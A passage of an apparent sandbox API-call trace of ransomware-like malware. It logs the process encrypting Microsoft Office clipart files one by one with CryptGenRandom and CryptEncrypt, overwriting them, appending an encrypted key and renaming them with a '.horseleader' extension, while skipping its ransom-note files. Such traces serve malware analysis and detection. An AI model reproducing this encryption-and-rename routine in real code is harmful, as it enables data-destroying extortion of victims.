Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF", lpSrch=".testttjffg") returned 0x0 [0253.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 67 [0253.824] StrStrW (lpFirst="CLASSIC2.WMF", lpSrch=".txt") returned 0x0 [0253.824] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2262) returned 1 [0253.824] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff72a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.826] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8d6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.826] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.827] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.827] CloseHandle (hObject=0x158) returned 1 [0253.827] GetProcessHeap () returned 0x780000 [0253.827] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.827] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.horseleader") returned 79 [0253.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.horseleader")) returned 1 [0253.828] GetProcessHeap () returned 0x780000 [0253.828] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.828] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c76e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CLIP.WMF", cAlternateFileName="")) returned 1 [0253.829] lstrcmpiW (lpString1="CLIP.WMF", lpString2="Windows") returned -1 [0253.829] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 63 [0253.829] StrStrIW (lpFirst="CLIP.WMF", lpSrch=".horseleader") returned 0x0 [0253.829] lstrcmpW (lpString1="CLIP.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.829] lstrcmpW (lpString1="CLIP.WMF", lpString2="_uninstalling_.png") returned 1 [0253.829] lstrlenW (lpString=".testttjffg") returned 11 [0253.829] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF", lpSrch=".testttjffg") returned 0x0 [0253.829] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.829] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.832] lstrlenW (lpString="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 63 [0253.832] StrStrW (lpFirst="CLIP.WMF", lpSrch=".txt") returned 0x0 [0253.832] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2262) returned 1 [0253.832] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff72a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.835] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8d6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.835] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.835] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.835] CloseHandle (hObject=0x158) returned 1 [0253.835] GetProcessHeap () returned 0x780000 [0253.835] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.836] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.horseleader") returned 75 [0253.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.horseleader")) returned 1 [0253.836] GetProcessHeap () returned 0x780000 [0253.837] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.837] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CMNTY_01.MID", cAlternateFileName="")) returned 1 [0253.837] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="Windows") returned -1 [0253.837] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 67 [0253.837] StrStrIW (lpFirst="CMNTY_01.MID", lpSrch=".horseleader") returned 0x0 [0253.837] lstrcmpW (lpString1="CMNTY_01.MID", lpString2="#Decrypt#.txt") returned 1 [0253.837] lstrcmpW (lpString1="CMNTY_01.MID", lpString2="_uninstalling_.png") returned 1 [0253.837] lstrlenW (lpString=".testttjffg") returned 11 [0253.837] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID", lpSrch=".testttjffg") returned 0x0 [0253.837] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.837] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 
[0253.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.837] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 67 [0253.837] StrStrW (lpFirst="CMNTY_01.MID", lpSrch=".txt") returned 0x0 [0253.837] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6970) returned 1 [0253.838] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b3a, lpOverlapped=0x0) returned 1 [0253.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe4c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.840] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b3a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b3a, lpOverlapped=0x0) returned 1 [0253.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.840] CloseHandle (hObject=0x158) returned 1 [0253.840] GetProcessHeap () 
returned 0x780000 [0253.840] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.840] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.horseleader") returned 79 [0253.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.horseleader")) returned 1 [0253.841] GetProcessHeap () returned 0x780000 [0253.841] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.841] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51d0f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0x1496, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CRANE.WMF", cAlternateFileName="")) returned 1 [0253.841] lstrcmpiW (lpString1="CRANE.WMF", lpString2="Windows") returned -1 [0253.841] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 64 [0253.841] StrStrIW (lpFirst="CRANE.WMF", lpSrch=".horseleader") returned 0x0 [0253.841] lstrcmpW (lpString1="CRANE.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.841] lstrcmpW (lpString1="CRANE.WMF", lpString2="_uninstalling_.png") returned 1 [0253.841] lstrlenW (lpString=".testttjffg") returned 11 [0253.841] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF", lpSrch=".testttjffg") returned 0x0 [0253.842] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.842] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.843] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 64 [0253.843] StrStrW (lpFirst="CRANE.WMF", lpSrch=".txt") returned 0x0 [0253.843] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5270) returned 1 [0253.843] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1496, lpOverlapped=0x0) returned 1 [0253.845] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.845] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1496, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1496, lpOverlapped=0x0) returned 1 [0253.845] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.845] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.845] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.846] CloseHandle (hObject=0x158) returned 1 [0253.846] GetProcessHeap () returned 0x780000 [0253.846] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.846] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.horseleader") returned 76 [0253.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.horseleader")) returned 1 [0253.847] GetProcessHeap () returned 0x780000 [0253.847] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.847] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x60609cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0xc18a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CRANINST.WMF", cAlternateFileName="")) returned 1 [0253.847] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="Windows") returned -1 [0253.847] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 67 [0253.847] StrStrIW (lpFirst="CRANINST.WMF", lpSrch=".horseleader") returned 0x0 [0253.847] lstrcmpW (lpString1="CRANINST.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.847] lstrcmpW (lpString1="CRANINST.WMF", lpString2="_uninstalling_.png") returned 1 [0253.847] lstrlenW (lpString=".testttjffg") returned 11 [0253.847] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF", lpSrch=".testttjffg") returned 0x0 [0253.848] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.848] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 67 [0253.849] StrStrW (lpFirst="CRANINST.WMF", lpSrch=".txt") returned 0x0 [0253.849] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=49546) returned 1 [0253.849] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.852] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.852] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.853] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.853] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.854] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.854] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x218a, lpOverlapped=0x0) returned 1 [0253.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffde76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.854] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x218a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x218a, lpOverlapped=0x0) returned 1 [0253.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.854] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.855] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.855] CloseHandle (hObject=0x158) returned 1 [0253.855] GetProcessHeap () returned 0x780000 [0253.855] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.855] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.horseleader") returned 79 [0253.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.horseleader")) returned 1 [0253.856] GetProcessHeap () returned 0x780000 [0253.856] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.856] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51d354f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CUP.WMF", cAlternateFileName="")) returned 1 [0253.857] lstrcmpiW (lpString1="CUP.WMF", lpString2="Windows") returned -1 [0253.857] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 62 [0253.857] StrStrIW (lpFirst="CUP.WMF", lpSrch=".horseleader") returned 0x0 [0253.857] lstrcmpW (lpString1="CUP.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.857] lstrcmpW 
(lpString1="CUP.WMF", lpString2="_uninstalling_.png") returned 1 [0253.857] lstrlenW (lpString=".testttjffg") returned 11 [0253.857] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF", lpSrch=".testttjffg") returned 0x0 [0253.857] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.857] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 62 [0253.859] StrStrW (lpFirst="CUP.WMF", lpSrch=".txt") returned 0x0 [0253.859] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2966) returned 1 [0253.859] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 